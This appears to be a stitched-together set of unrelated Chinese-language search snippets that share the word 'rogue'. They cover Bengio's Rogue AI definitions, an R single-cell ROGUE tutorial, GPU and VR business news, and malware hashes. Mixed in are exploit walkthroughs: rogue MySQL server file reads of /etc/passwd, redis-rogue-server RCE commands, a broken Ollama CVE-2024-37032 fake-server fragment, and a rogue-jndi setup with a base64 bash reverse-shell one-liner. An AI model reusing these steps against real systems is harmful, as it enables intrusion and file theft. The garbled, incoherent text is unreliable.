于是Bengio团队做了一系列的正式定义Rogue AI、假设和主张,并讨论了发生条件、可能情况以及规避策略。 Rogue AI如何出现 定义1:一个潜在的Rogue AI,是一个自主的人工智能系统,其行为方式可能会对大部分人类造成灾难性伤害,可能会危及我们的社会,甚至我们的物种或生物圈 。 然而最新进展表明,超级智能AI(全面比人类聪明)的建立离我们预期比以前更近,我们不清楚如何防止潜在的Rogue AI产生。 Rogue AI是目标驱动的。 更深入了解Rogue AI的产生方式,需要在技术和政策方面的努力。 如果这些目标不严格包括人类和生物圈的福祉,即不足以与人类的权利和价值观保持一致,那么这样的系统就有可能成为潜在的Rogue AI。 下面这些情况都将可能导致Rogue AI的出现: 不怀好意的人类。
server"} # for ollama pull @app.get("/v2/rogue/bi0x/manifests/latest") async def fake_manifests(): /etc/passwd\"" return 'cve-2024-37032-test' @app.head(f"/root/.ollama/models/manifests/{HOST}/rogue /root/.ollama/models/manifests/dev-lan.bi0x.com/rogue/bi0x/latest" response.headers["E-Tag"] = "\ /root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest","size":10}]} @app.head("/root/bad.so") async /tmp/notfoundfile\"" return 'cve-2024-37032-test' # for ollama push @app.post("/v2/rogue/bi0x/blobs
如何计算ROGUE index呢 有一个r包可以完成,大家可以安装它并且读一下它的官网说明书 : # devtools::install_github("PaulingLiu/ROGUE") # https ://github.com/PaulingLiu/ROGUE/blob/master/vignettes/ROGUE_Tutorials.html 仍然是使用大家熟悉的数据集作为案例: library 是很小的: > rogue.value [1] 0.7476979 # ROGUE范围为0~1,ROGUE = 1表面该亚群纯度很高; # 相反ROGUE ~0,表面该亚群纯度较低可以被继续细分 # ROGUE评分默认>0.9时是一致性比较高的细胞亚类 我们有两个方法可以看看具体的每个单细胞亚群的ROGUE index rogue.res <- rogue(expr, labels = sce$seurat_annotations rogue.boxplot(rogue.res ) > as.data.frame(t(rogue.res)) pbmc3k Memory.CD4.T 0.9727606
请注意,仅仅阻止默认端口是不够的,因为攻击者可以自由选择端口来运行 Rogue LDAP 服务器。通常,通过将所需流量列入白名单来限制传出服务器流量是一个好主意。 ://159.89.182.117/wp-content/themes/twentyseventeen/ldm # Kinsing payload URL 45.130.229.168:1389 # Rogue LDAP server 82.118.18.201:1534 # Rogue LDAP server 45.130.229.168:1389 # Rogue LDAP server 185.250.148.157 :1389 # Rogue LDAP server 92.242.40.21:5557 # Rogue LDAP server 205.185.115.217:47324 # Rogue LDAP server 163.172.157.143:1389 # Rogue LDAP server 45.155.205.233:12344 # Rogue LDAP server 如果您使用基于 Snort 或 Suricata
漏洞利用 EXP: https://github.com/Gifts/Rogue-MySql-Server/blob/master/rogue_mysql_server.py 此处我们使用 VulnSpy 使用vim编辑rogue_mysql_server.py文件,将PORT = 3306修改为PORT = 3307 PORT为监听端口,filelist为要读取的文件 5). 运行python rogue_mysql_server.py,启动服务 6). 打开phpMyAdmin的登录页面,地址输入db:3307、用户名vulnspy、密码vulnspy,提交登录。
首先,您需要从以下链接的 GitHub 存储库中克隆和构建工具 rogue-jndi: veracode-research / rogue-jndi 用于 JNDI 注入攻击的恶意 LDAP github.com:veracode-research/rogue-jndi 在尝试编译此工具之前,请确保已安装 Maven 和 Java。 这个单线应该做你需要的一切: git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package echo 'bash -c bash -i >&/dev/tcp/192.168.11.50/4444 0>&1' | base64 使用 Base64 输出,在 rogue-jndi 中构建您的命令 然后启动您的 rogue-jndi LDAP 服务器。
近日,Imagination发布了新PowerVR图形架构Furian,这也是自2010年Rogue推出以来的第一个主要图形架构升级。 目前,iPhone 7的GPU是基于Rogue的,相较于Rogue,Furian将集群从12个提升至60个,总体性能提高了35%,游戏性能提高了70%—90%。
漏洞检测 下载exp到本地: git clone https://github.com/LoRexxar/redis-rogue-server.git 下载执行模块: git clone https:/ /github.com/n0b0dyCN/RedisModules-ExecuteCommand.git 然后将该模块编译:make 在当前目录下会生成一个module.so 将其复制到redis-rogue-server 目录下并改名为exp.so 在攻击机上执行命令: python3 redis-rogue-server.py --rhost 192.168.232.170 --rport 6379 --lhost 192.168.232.129 参考链接: https://s.tencent.com/research/bsafe/755.html https://github.com/LoRexxar/redis-rogue-server https
资本动态 VR内容工作室The Rogue Initiative完成百万级美元A轮融资 虚拟现实内容工作室The Rogue Initiative已经完成了7位数的A轮融资,由位于中国的CBT Capital The Rogue Initiative将会利用这笔资金进一步开发传统和沉浸式电影电视项目、娱乐内容IP以及相关技术。 The Rogue Initiative此前宣布,他们将与好莱坞著名导演迈克尔·贝合作拍摄原创娱乐内容,而迈克尔·贝将持股The Rogue Initiative,并作为战略合作伙伴和顾问。 制片琳达·奥布斯特(《星际穿越》、《超时空接触》和《西雅图夜未眠》)同样与The Rogue Initiative达成了类似的合作关系。
The Rogue Initiative完成百万级美元A轮融资 《Crowe: The Drowned Armory》 近日,VR内容工作室The Rogue Initiative确认完成了7位数的A The Rogue Initiative表示将会利用这笔资金进一步开发传统和沉浸式电影电视项目、娱乐内容IP、以及相关技术。 VRPinea独家点评:打造优质内容才能营造良好的VR生态。
2f5a9fc32567140253bf49153b22cf5c868ed06e Rootkit/NetSec.a 3470f3b06f387bb7bb55459c0786f6ed512e926d Rogue /NetSec.gen 0a1655d06ed5a6550b495df627cd76bd0ab046ff Rogue/NetSec.gen 0c9226676127709d032cff8c695c14abba49c3cf Rogue/NetSec.gen 177f5703f4ba8c146e955b5bdfe6860d4cb4f7f1 Rogue/NetSec.gen 1fb098637af04af4b7f7cd4bf3521d8d0d1f716c Rogue/NetSec.gen 25670f556ee4fd376164dcb43cf06ae1bad26dd5 Rogue/NetSec.gen 25822c34eabe5c1a0d1051a1836f5b50196c7f08 Rogue/NetSec.gen 297b687805f31cde2be0d55e7ec25acfdbd9a02c 本文作者:火绒安全,未经许可禁止转载
target redis port, default 6379 -L LHOST, --lhost LHOST rogue server ip -P LPORT, --lport LPORT rogue server listen port, default 21000
https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本 注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server 参考链接: https://github.com/Ridter/redis-rce https://github.com/n0b0dyCN/redis-rogue-server https://www.cnblogs.com
1、下载 https://github.com/n0b0dyCN/redis-rogue-server//未授权https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server 3、执行反弹 1)执行反弹 python3 redis_rogue_server.py -rhost 192.168.253.27 -lhost 192.168.253.9 -passwd dayu123 2、下载 https://github.com/n0b0dyCN/redis-rogue-server//未授权https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server //有密码 将redis-rogue-server的exp.so文件复制到Awsome文件夹中使用,因为exp.so带system模块! 2)开启主服务器 python3 redis_rogue_server.py -v -path exp.so 开启15000端口的主服务器!
下载漏洞利用工具:Rogue-MySql-Server,配置完之后在服务上启动 填写服务器地址,访问 ? 成功读取到目标的/etc/passwd文件 尝试读取web目录文件 ? AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/ https://xz.aliyun.com/t/6587 https://github.com/allyshka/Rogue-MySql-Server
Spawns a rogue (fake) AP, imitating the original access point. Spawns a jammer, deauthenticating all clients from original AP and luring them to the rogue AP. Select an internet connectivity type for the rogue network. ? clients, and some Android clients to not show the captive portal immediately upon connecting to the rogue Select a captive portal interface for the rogue network.
攻击机(服务端): Kali Linux 192.168.43.247 受害机(客户端): Ubuntu 192.168.43.82 首先下载大佬写好的POC脚本 Rogue-MySql-Server, 找到 rogue_mysql_server.py 脚本的第26行处的元组 filelist: ? 然后在攻击机(服务端)上执行rogue_mysql_server.py脚本: python rogue_mysql_server.py ? image-20210407175447854 当客户端连上攻击机搭建的服务端瞬间,服务端便可以读取到受害机客户端上的/etc/passwd,并记录到 Rogue-MySql-Server 中的日志文件中 首先在自己vps上面使用 rogue_mysql_server.py 搭建一个恶意的MySQL服务端(如果MySQL端口冲突可以换一个端口,这里我改成了3307端口): ?
然后启用redis 5.0的docker ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ sudo docker ps CONTAINER ID 然后直接通过脚本来攻击服务端 ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ python3 redis-rogue-server_5.py -- r\n$2\r\nNO\r\n$3\r\nONE\r\n' [->] b'+OK\r\n' 然后我们链接上去就可以执行命令 ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server
----------------------- ------------------------------------------------- 0 Thu Aug 4 19:54:14 2005 Rogue : 00:0b:85:18:b6:50 Interface no:1(802.11 b/g) with RSSI: -78 and SNR: 10 1 Thu Aug 4 19:54:14 2005 Rogue : 00:0b:85:18:b6:50 Interface no:1(802.11 b/g) with RSSI: -72 and SNR: 16 2 Thu Aug 4 19:54:14 2005 Rogue
AdaptiveMobile将其描述为切片上的流氓网络功能(rogue network function)。 Rogue Slice Gains Potential Access to Other Slice Resources 根据AdaptiveMobile的说法,这是真实可能会发生的,因为当前的网络切片功能规范不要求在同一网络上的不同切片之间进行